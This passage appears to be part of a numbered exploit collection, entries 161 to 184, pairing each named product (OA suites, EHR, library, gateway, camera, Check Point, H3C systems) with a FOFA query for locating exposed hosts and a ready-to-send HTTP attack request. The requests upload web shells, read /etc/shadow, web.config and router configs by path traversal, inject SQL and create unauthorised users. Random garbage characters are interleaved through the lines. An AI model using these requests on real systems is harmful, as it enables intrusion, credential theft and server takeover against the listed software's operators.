8 F/ \) y; Y! l: J' w4 |8 x; g- h<soap:Body>5 }3 M. [: A8 u% o" G: M; |/ {+ a0 s
<UploadResume xmlns="http://tempuri.org/">
~* k9 G" s/ N$ @3 l; B7 S<ip>1</ip>- f6 q) A/ \: o# W( p
<fileName>../../../../dizxdell.aspx</fileName>
0 y9 ^8 i# \+ _. r<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
0 b! }9 ^9 i' M- L: y7 ~8 ?1 b<tag>3</tag>% ]2 A, R' f2 g6 i2 `
</UploadResume>" R* i9 b! _+ c3 |' v
</soap:Body>* i! w7 U" K) b' \2 w7 j
</soap:Envelope>
/ B1 j2 h/ f+ X" ?% h# C2 G4 R( o/ J1 J
/ z4 l I/ W0 z4 a1 d# p2 V
http://x.x.x.x/dizxdell.aspx
+ W2 |" \) {) A8 E6 B
7 g- [! v+ v) i6 \4 t" A/ E7 T2 X162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传* n! V5 [" b- x+ q3 I- \7 p3 z
FOFA: app="和丰山海-数字标牌"
: P' S$ E# r$ C0 r' FPOST /QH.aspx HTTP/1.1
+ d6 y5 K. {- S' P/ [1 {Host: x.x.x.x) f* I5 V' g6 P' m$ m1 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
/ U0 [0 a7 p. ]5 R8 i7 CConnection: close
' e w3 t [, q% p2 uContent-Length: 583
" u- o! L! V5 g7 X; j( ^Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey7 J# q7 e# y5 k+ v7 ?0 o5 N! p
Accept-Encoding: gzip
' u; [2 u1 Z" y# w- ~/ t! O9 Q4 M3 w. Q @
------WebKitFormBoundaryeegvclmyurlotuey
1 [; s6 B4 X6 N+ |' L* y, Q( nContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
) U/ t s* m+ TContent-Type: application/octet-stream
. R" A* H P$ [3 O+ u3 |$ C0 ^" i8 D/ ?% C' a5 V3 N) ~& a5 @% ]0 o
<% response.write("ujidwqfuuqjalgkvrpqy") %># n. X3 w4 ^' F& e
------WebKitFormBoundaryeegvclmyurlotuey% v4 h! Q8 U) b4 W# M0 S
Content-Disposition: form-data; name="action"# L- Y4 c' u$ Y3 o' C; S4 D3 j6 R6 k
7 o: R2 d+ V9 G) W0 t) g
upload
2 N+ h: L. x8 c% H9 E; J6 Z------WebKitFormBoundaryeegvclmyurlotuey1 d. j7 Q/ z) r* Z! R5 M* A( ?) M
Content-Disposition: form-data; name="responderId"# P! Z9 ?2 _1 J# r4 y8 }! e& }
7 U9 w6 X1 l, K. ^
ResourceNewResponder: X, t4 R+ ?1 n: w) U
------WebKitFormBoundaryeegvclmyurlotuey
6 Y7 M9 a( \ U- D( SContent-Disposition: form-data; name="remotePath"
) z8 n. [' C; H! v0 ?7 U% R; ?" I) I9 T# x' K
/opt/resources) s; I5 W2 a- C2 B7 k* q4 r
------WebKitFormBoundaryeegvclmyurlotuey--
0 d! Y5 }; _/ q- I+ ~
" M, V. H/ G- k$ Z) h& s& ]* N) F' X7 v3 k" \/ `/ \" m& I* l/ M
http://x.x.x.x/opt/resources/kjuhitjgk.aspx+ c/ z. p6 g% W, t8 ^. m! N
. G* ]$ o5 M/ x
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传" ^! l& Z7 M$ X5 I( Z+ [4 C: G
FOFA: icon_hash="-795291075"
9 D* m3 I0 F+ P1 E, c5 S! ZPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
) j Q- C$ c/ [Host: x.x.x.x
2 Y$ u0 r; c* I0 Z% q0 b: PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.360 p$ t; I6 ?& `5 A# L& o/ \" F
Connection: close* F8 a5 v; [; E! i
Content-Length: 293
& i; A% K5 k; Z4 i; s& O# `Accept: */*' ?' O5 t& q6 Z# h% T" v/ h. Q7 @
Accept-Encoding: gzip, deflate" E5 r1 H0 r, E+ q# k
Accept-Language: zh-CN,zh;q=0.9
& o7 e0 C, _% bContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
1 H, L! A5 H( Y( x" i- q$ H3 n! v$ {% {' _
------iiqvnofupvhdyrcoqyuujyetjvqgocod% _4 M( p# B O2 w
Content-Disposition: form-data; name="name" T" E. D2 G: L. Q) x
, Y% P6 W' k+ Y* C6 p1.php
7 K: L }' \1 s! E------iiqvnofupvhdyrcoqyuujyetjvqgocod
$ W2 U& U: |5 j$ |6 [Content-Disposition: form-data; name="upfile"; filename="1.php"
: C- S* M+ l9 E: xContent-Type: image/jpeg
0 S' `. M9 Q- k& C4 l1 F C, P+ g( i
rvjhvbhwwuooyiioxega1 ?( i! k3 {9 r1 e" H/ |
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
) s: S& c! {! q% c" i# Y/ D1 s- ~ n2 I9 `. S b" j
) P6 S9 O& r$ P; D% J2 o, g W8 f164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
1 f9 ?# i0 P1 n/ |FOFA: title="智慧综合管理平台登入"
/ U: P/ J) h2 _- \$ W) L$ g( p! mPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.17 ?, M0 t5 e0 o* y
Host: x.x.x.x8 M$ e5 `1 z8 E0 Y, H, ]4 V+ w2 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
1 d8 [$ h, c: H3 n* I4 n' o+ qContent-Length: 288
8 v; T) p! ^" d- u( kAccept: application/json, text/javascript, */*; q=0.01
7 m' Y( J, P6 t! @3 Q# ~1 e* eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,+ g+ W. y2 H- C8 M' R5 A
Connection: close
, ?/ T v8 \+ k- Z! m$ H0 UContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl9 d/ N; }8 v4 U1 X: h! A" c
X-Requested-With: XMLHttpRequest9 V& v4 C( m8 F1 @
Accept-Encoding: gzip: h ?0 g* v4 g. V, o
' ?3 |: ~$ h" R; A! t# c+ h. l
------dqdaieopnozbkapjacdbdthlvtlyl
) H$ f- u5 E6 j' GContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"2 T s7 R) Y# @# d+ H r5 I6 ?
Content-Type: image/jpeg
( g M1 C0 p( p4 d" E7 K; p7 p7 U# a; [# N0 h# m/ [
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
3 ?- d& p, |' X4 n8 h------dqdaieopnozbkapjacdbdthlvtlyl--9 ], f' W- s3 M" h
# k! D v7 D* u( |( P- N
- Q# U# v; E$ }, t+ J2 C" e
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx- v. f3 u3 L4 M" W' { r0 w
4 b- X8 G7 u( q8 F& I165. OrangeHRM 3.3.3 SQL 注入0 k; T4 c& i2 ]. t
CVE-2024-364288 C) U0 O' B/ s" y* O7 Q
FOFA: app="OrangeHRM-产品"- D. M9 @. K- u" o: F7 g! }
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))) E/ E5 V. \( ^0 U. k: o
3 I/ y# N1 {* z$ J' R) O# M# ~1 V1 q5 ]
166. 中成科信票务管理平台SeatMapHandler SQL注入7 C& O* S7 B; \0 @4 r! J6 U l
FOFA:body="技术支持:北京中成科信科技发展有限公司") E, ?5 W1 O) o/ i) o4 [
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1+ X5 f1 _: w) t7 D3 k
Host:
0 W9 U3 I9 B/ R% N5 b6 X( k# nPragma: no-cache
_; i" D k0 T4 F, R( nCache-Control: no-cache
6 f$ h3 S7 ^( o$ d! g/ ]% EUpgrade-Insecure-Requests: 17 J. ^9 T0 m8 H- v, L1 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.365 s) q7 r! y5 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 W8 [6 N# s [- ?$ o& Z9 C& IAccept-Encoding: gzip, deflate
$ y6 A- `: B8 P! T: [3 rAccept-Language: zh-CN,zh;q=0.9,en;q=0.8+ S) P, O" h# Q$ b* O+ D, F
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
" S# \% X) D. Q/ L) B1 NConnection: close
" n- @' N0 @( P; @6 H% a" }, HContent-Type: application/x-www-form-urlencoded
% b T) w) z) t7 e8 }/ @Content-Length: 89
- G- I# S4 g6 X4 \7 a
+ ?; f* t* z. B* \ {Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
5 Z5 Q( M3 p0 _5 e# c
6 Y! D# Y- N1 D: U9 M5 \1 {5 D- _5 f
167. 精益价值管理系统 DownLoad.aspx任意文件读取
2 | ^- J7 r/ B6 \& _9 v- gFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
" B3 o: t, v. q2 g+ o7 V4 xGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
, ^9 k, A; ]# X C& pHost:
9 Y( @7 M1 B5 J. Z& c& iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ B' R. `# y0 r- o( n% v6 ?Content-Type: application/x-www-form-urlencoded, y- q7 M1 E. U. [) {6 I6 z: h$ w
Accept-Encoding: gzip, deflate2 w) N* m' w# ^; W( A
Accept: */*/ [# f/ a) i9 {& f
Connection: keep-alive
2 M6 z. ~; f# x% X$ y% p A+ }! a9 @8 A/ D5 X. k
$ v3 y0 t: {1 @ l: K* y0 [( ^! t168. 宏景EHR OutputCode 任意文件读取- f- g( t- K p) O6 A9 }
FOFA:app="HJSOFT-HCM"
6 U% f5 ^" L0 {, `9 ?( XGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1 {) Q- c. T- H7 C* H O
Host: your-ip; v+ n3 C. P3 C! U, N+ l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
/ D9 X/ ^6 `6 V) @Content-Type: application/x-www-form-urlencoded
! W! {- y5 B- U+ @Connection: close5 Y# r/ r5 g) x1 i
( T( a. K7 t1 Z7 w" H* G4 v
5 D- _* h4 J+ n0 B) V1 r/ f) J& [2 v6 @
169. 宏景EHR downlawbase SQL注入
' u# j$ R8 x6 p" t& gFOFA:app="HJSOFT-HCM", ~+ R! e* |9 c
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
. F; v( A* ~ i5 O$ k0 Y1 s4 BHost: your-ip
3 ~* h' g9 l# F- RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ o9 @; z0 v$ V! r& [9 \
Accept: */*
/ o7 ~; R. y$ n7 X9 {1 PAccept-Encoding: gzip, deflate |7 k# e/ x% [% B+ p
Connection: close
5 p7 S5 s: w( B' C3 [" Q: }* c; r% O$ i5 i4 @1 q9 Y( p- Q3 a* U; W
. z+ p% p0 J8 m: p2 p! @5 b: c/ [! N. S) ~' d' s
170. 宏景EHR DisplayExcelCustomReport 任意文件读取5 k/ I+ Y( p; Q7 a4 m
FOFA:body="/general/sys/hjaxmanage.js"
6 C* E+ w7 C- k+ TPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
1 Q$ t: J7 @2 \# r. ] nHost: balalanengliang
/ S: C3 C& i! m3 M$ ^0 z5 _! HUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, O% e! E9 @2 J. g. N9 Y
Content-Type: application/x-www-form-urlencoded
+ l8 j8 {# x( e! X4 T) o& e" d0 t7 q. s. b( H7 w3 ]# z4 C
filename=../webapps/ROOT/WEB-INF/web.xml
0 B+ `! b# b# `: _1 @/ q( C4 N9 u: a# T9 ?% h5 ^( e8 F. y& O; y2 x
( {- C4 m8 |* h+ C2 J
171. 通天星CMSV6车载定位监控平台 SQL注入9 `) O% \9 g4 D0 G
FOFA:body="/808gps/"
/ c# R# g1 I1 PGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1' `3 T- O, b, g0 r# s3 ^ _
Host: your-ip! W/ V. I3 i& f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
- } l! e- G8 p. i$ ^- M* oAccept: */*" Z+ e' e4 ~6 k( ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 ~1 W& u( t7 a5 v4 z( n5 G
Accept-Encoding: gzip, deflate) ]$ F2 l* V0 M$ B4 Q4 b) c
Connection: close% e; Z8 Z0 j- O" J1 P: Y) r/ R' L
6 j7 q9 Z% H* L; R$ Q8 A% k2 m8 y
1 e$ H) z! W$ L/ [; W7 e8 [& w) [5 U' q# V: R* ~ h# R) b
172. DT-高清车牌识别摄像机任意文件读取. L: y ~7 e6 B# |3 a) M
FOFA:app="DT-高清车牌识别摄像机"
1 g" M0 n8 r2 Z4 W3 j! \5 l9 pGET /../../../../etc/passwd HTTP/1.1# i! E/ [) E( b. g% C, w. W
Host: your-ip
# o2 d# Q9 L, M* }% |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; g2 K! d! H& |/ C2 L: aAccept-Encoding: gzip, deflate
/ _1 X) O8 B ]Accept: */*1 \. c* P$ l% F2 T7 c
Connection: keep-alive
) k( e# k$ e* v1 k7 I7 @, N g/ a a6 r4 @3 Q% r5 E3 `
1 K4 z* L* M7 ~. C, s
# a/ M! h/ W" x. Z173. Check Point 安全网关任意文件读取
8 _9 [( [+ w) SCVE-2024-24919
& T. r, D+ z8 f& r( WFOFA:app="Check_Point-SSL-Network-Extender"
( S% N: K( v, a3 TPOST /clients/MyCRL HTTP/1.1
! Z& I# H `' m& qHost: your-ip
+ e8 Z" B9 B4 d1 cContent-Type: application/x-www-form-urlencoded
" F2 ~3 D3 {, _( y6 E P8 N% `2 }$ |, o$ d. `8 ?
aCSHELL/../../../../../../../etc/shadow: [ j! [* L6 B3 U) K% |3 [/ n8 R
6 D0 T! O7 A* ]: D# ^- A: I& I0 Z' {# f3 G0 W
4 t" V" b) J/ }$ P+ ^
174. 金和OA C6 FileDownLoad.aspx 任意文件读取" V) z) x" B) |6 J/ c
FOFA:app="金和网络-金和OA"7 P" L) N7 G+ y) |: k* e
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
) ]% }" W9 e) [6 ~9 p* ]. t3 fHost: your-ip
( N+ C2 i5 b) G# G) t$ uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 E4 V. j0 h+ d l0 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# D8 I6 y; o& yAccept-Encoding: gzip, deflate, br
$ m0 ^0 A7 C' O3 sAccept-Language: zh-CN,zh;q=0.9
$ K$ f; A9 P0 o& d, \, V. LConnection: close1 V$ X s9 S l
7 H. f2 D$ `7 N% j9 j2 F9 L* Q) x% F, q. p! ~
8 [/ l4 F; X4 W1 O' P175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入: j( @. a" o- _$ T( c5 h
FOFA:app="金和网络-金和OA": D+ w& f8 X8 R: i+ K% x, ^# s
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
7 D9 @. b$ B# }8 X$ qHost:
0 @ ?- y W: ^; u& BUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ _/ r1 ~. O$ {, L U% oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% l: d3 |8 ~$ V* R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# @1 c. L8 b3 p0 U) r& G* _
Accept-Encoding: gzip, deflate# i1 p' D3 w' t/ s; N
Connection: close4 t$ ^! ^9 _& _/ M9 e. Y
Upgrade-Insecure-Requests: 18 ?+ d) q$ h# \' G+ q/ x; f
2 i& ]8 t5 I$ K
: J! P" U6 X1 x5 z+ c$ G176. 电信网关配置管理系统 rewrite.php 文件上传; w1 P4 e& ]) [1 b' b2 h9 s0 i
FOFA:body="img/login_bg3.png" && body="系统登录"# t* X5 j8 N" n$ T& p6 t
POST /manager/teletext/material/rewrite.php HTTP/1.1
& W2 Y7 [+ B: v W; I1 G6 PHost: your-ip
" I8 v$ } t6 o: v" mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.06 c2 M# h% U7 w2 [( b8 ^6 x) B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
3 Q$ @1 |3 \5 n. u* [% y+ l" zConnection: close
+ c5 W5 X2 {/ {- H" ]: M2 }. w1 k& N8 R j) l# c
------WebKitFormBoundaryOKldnDPT
! A' V" o# a9 l# S8 S! CContent-Disposition: form-data; name="tmp_name"; filename="test.php"! P+ V/ B( T) ?" R6 Z+ t: E. K: f
Content-Type: image/png5 J5 }/ w: a5 x1 I/ k+ E
4 M. z) J m& P& N9 C2 I# v<?php system("cat /etc/passwd");unlink(__FILE__);?>
' w! |0 ~) r8 {6 S! @1 f------WebKitFormBoundaryOKldnDPT
4 P! M4 X2 e5 E. ?% E3 @ q! OContent-Disposition: form-data; name="uploadtime"5 A5 P% z3 h6 T$ U, }, ? a
& }0 M4 [* D. Y$ n- o' H
/ B. l# y8 e" Q. c: m# V9 l: J------WebKitFormBoundaryOKldnDPT--6 T, w: W' J, y& r
5 m8 [; S' Z! |) }4 I& ~% p' F/ Y; [+ j2 s/ j# b3 [- o$ y: Y
/ j3 a/ B9 b' E# u177. H3C路由器敏感信息泄露
* A5 ~, \, f8 ^4 y/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg, D. c- d9 n' \8 i3 X6 I- D( e2 W2 b! N+ y
/userLogin.asp/../actionpolicy_status/../M60.cfg9 j4 G* x- G& I4 ]) @! ~ b
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
`: g, W" S6 ~! Z& U4 x/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/ R$ p. w3 h$ n$ P6 _# _% U* q/userLogin.asp/../actionpolicy_status/../GR3200.cfg# d2 Y% U7 O7 D Q6 }) A! @4 A
/userLogin.asp/../actionpolicy_status/../GR2200.cfg- E& F5 v' l' [$ G" W, v
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
1 J g- t! Q+ r$ x# F4 {/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg7 d9 F, m, U8 S5 s- j
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
. ]- C: }# B' k/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg0 X* b$ T" z8 X5 H9 l3 Y; {
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
8 C0 t- c! \( ]$ J9 ~/userLogin.asp/../actionpolicy_status/../ER5100.cfg w( e, m1 O E& V! b+ R) B2 E4 G
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg. i( n" m% N4 T
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
) w* |3 y% W4 k, U ` e! a9 e- ~( D4 w/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg5 R+ S6 Z, G9 E* w* f
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
4 G- V6 y( e9 h# x5 g$ F0 l2 e/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
& y9 N2 N+ w% `3 t& S/userLogin.asp/../actionpolicy_status/../ER3108G.cfg7 E4 t& k0 S: [. x. G' U9 A
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
( d4 _! A% j# L" e; i# K/userLogin.asp/../actionpolicy_status/../ER3100.cfg/ \; W. p- ~# c3 f1 i
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg$ F8 \- M* i+ F6 r ]1 l
2 Z l; R( z. ?4 r8 S- Y
" C% L K" _' ~0 J9 f
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
( D- {: T- y5 q+ A" W: C9 L- K- OFOFA:header="/selfservice"5 q$ r' r; V) u; q9 _
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
2 U8 l; e7 t% q7 R1 y" @Host:
- N' y" L6 o. XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
0 i; l& |- H; n1 s# r& P6 oContent-Length: 252
$ F- X6 P/ D# Y1 ~4 Y5 o* ?Accept-Encoding: gzip, deflate
( \. d' s d/ j7 f8 c8 Q# J. @* @$ n. ZConnection: close
' `5 o4 w6 h7 v7 v0 UContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l/ b" c2 n4 f- [3 w
-----------------aqutkea7vvanpqy3rh2l4 K- W% \. h. s; n% {9 P+ V
Content-Disposition: form-data; name="12234.txt"; filename="12234"" c+ l. ^. H5 U1 ?* m
Content-Type: application/octet-stream& z! ~7 u# I; h$ L- C, C- V& f
Content-Length: 2554 l- A: t3 _5 Q8 a8 E# H9 z& J
9 ~7 F+ I, _6 s7 k1 i: v; T& q% `
12234
1 P5 |1 O! D+ \. b }1 p-----------------aqutkea7vvanpqy3rh2l--
* }7 {+ G+ f/ @. n" n5 i% G2 y3 G
T1 ~2 t3 k7 f, }7 M, ^& z
GET /imc/primepush/%2e%2e/flex/12234.txt8 Q/ m! ?( N7 g7 }/ |
+ {* C! N A8 E L" t+ ^7 \
3 r' G, W& }! m
179. 建文工程管理系统存在任意文件读取7 [4 b5 T! l/ ?1 G9 E5 t
POST /Common/DownLoad2.aspx HTTP/1.14 ]% F. e# q& ^- J0 _4 _" J- d
Host: {{Hostname}}
7 Z$ ]& e7 ^" m- H6 AContent-Type: application/x-www-form-urlencoded" p5 v/ `* b' ]2 e, C& _
User-Agent: Mozilla/5.0* p1 u& y4 }( p; N5 k7 z0 \* Y0 a
/ P. j9 C! o% o" `* N% R2 x R" bpath=../log4net.config&Name=" u' T" H6 q: R! a$ Q+ w! K' ]; u1 C0 E
) M `% |0 C* e; H( z( [; `! M: z( u
180. 帮管客 CRM jiliyu SQL注入
, j# a- @4 `, d' MFOFA:app="帮管客-CRM"
+ x- e& W% h# v* U. K6 }4 FGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
0 a- q; [2 [$ m; jHost: your-ip8 P. b7 f: r6 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ Q( W7 j0 l0 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; q) A2 s3 T: [+ i
Accept-Encoding: gzip, deflate
0 W5 h. h' w& T: X* _, U: B4 KAccept-Language: zh-CN,zh;q=0.9: X6 t8 K/ N' W
Connection: close
9 J4 M( T/ K' e+ R
" R8 j4 a1 F5 \5 g9 ], m( N
U+ A- M2 ^! `; O4 P- X6 E: J' P181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入; V0 q1 |" h( W" z
FOFA:"PDCA/js/_publicCom.js"
6 F6 w2 c/ b+ {6 W- c4 oPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.11 D2 |/ H3 U7 O( ~, k. G8 b& [7 I
Host: your-ip2 o+ d" w9 Y0 ]+ ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+ ?4 q- [, z0 P! VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- a% H. c3 o* J: Y6 X
Accept-Encoding: gzip, deflate, br
% q$ l. Z$ U3 W& p( ^Accept-Language: zh-CN,zh;q=0.9* f- B0 T2 }/ K
Connection: close
8 z* F$ |1 s: s- _' \! xContent-Type: application/x-www-form-urlencoded
: ?. P1 P+ F. V5 f3 S2 v; M) i% ]$ h# u# t' t! n3 H" ^9 f
# }+ Z: J- L) d$ O
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
4 q# [# Q' Q c9 `
3 h. K! I$ q: ^; n+ Q4 M' A% G3 O+ i! w) g
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
- U5 Q. l9 ]0 j, P0 fFOFA:"PDCA/js/_publicCom.js"3 z1 J+ a x" y* S1 A- g; h
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1# u5 e) Z6 Q8 c+ i5 I$ s# q
Host: your-ip: s1 |4 c# A0 h9 J6 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.363 e0 E$ o' e2 K% Q' m1 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 W; {3 \* \: [, j" W# n$ ~Accept-Encoding: gzip, deflate, br
% L' ?' r# j; |; T# _- fAccept-Language: zh-CN,zh;q=0.9
, P2 e% ^! |9 e: t% ?Connection: close2 W; ]' N& T, x4 Q# M, p% @
Content-Type: application/x-www-form-urlencoded1 X" Q2 c' f5 ^0 i
7 F0 {( U2 c6 |; I$ F) @' g
! g7 s; F4 H( zusername=test1234&pwd=test1234&savedays=1
; {# M, |/ s! k. Z
2 H3 ]3 }5 b+ F4 g, x& D2 g) L ~4 e( _. t$ t \
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
. y0 j, s: Z+ Z: N+ c/ E1 XFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"+ F: c6 ]: M' O5 u* J
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
+ ]! A! [- Z! n1 O0 }, d- m$ o( `Host: your-ip
0 `- H1 x u9 YUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
4 @$ Y: ~" N0 P" B" zAccept-Charset: utf-8
, ?: D& i, C: U# {Accept-Encoding: gzip, deflate
' F( |# \/ W$ W( x3 h+ @2 c' M3 pConnection: close
8 w# h- z. J5 q: M. w+ \/ ?' q0 E$ ^4 m
5 {/ @% Z$ Q% U" l# j" V+ C
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
* p2 B* E3 y. v" oFOFA:server="SunFull-Webs"' @! ~9 v& Z7 N9 {
POST /soap/AddUser HTTP/1.1
; F, ]$ c* F; [7 H0 y* iHost: your-ip8 T& m$ U, f! c9 Z" D
Accept-Encoding: gzip, deflate( e' b; }# ^/ ?# m1 A5 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0* C8 Y, X2 [4 c
Accept: application/xml, text/xml, */*; q=0.01" {' b+ B; r) O
Content-Type: text/xml; charset=utf-8& _6 E2 W8 O2 f0 ~/ i D" c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ Z$ Q2 ^6 A( r/ D* J
X-Requested-With: XMLHttpRequest
( p2 S6 U9 |; K' x/ a' ^/ B1 [* h6 ^. ?# [9 d# Q3 m
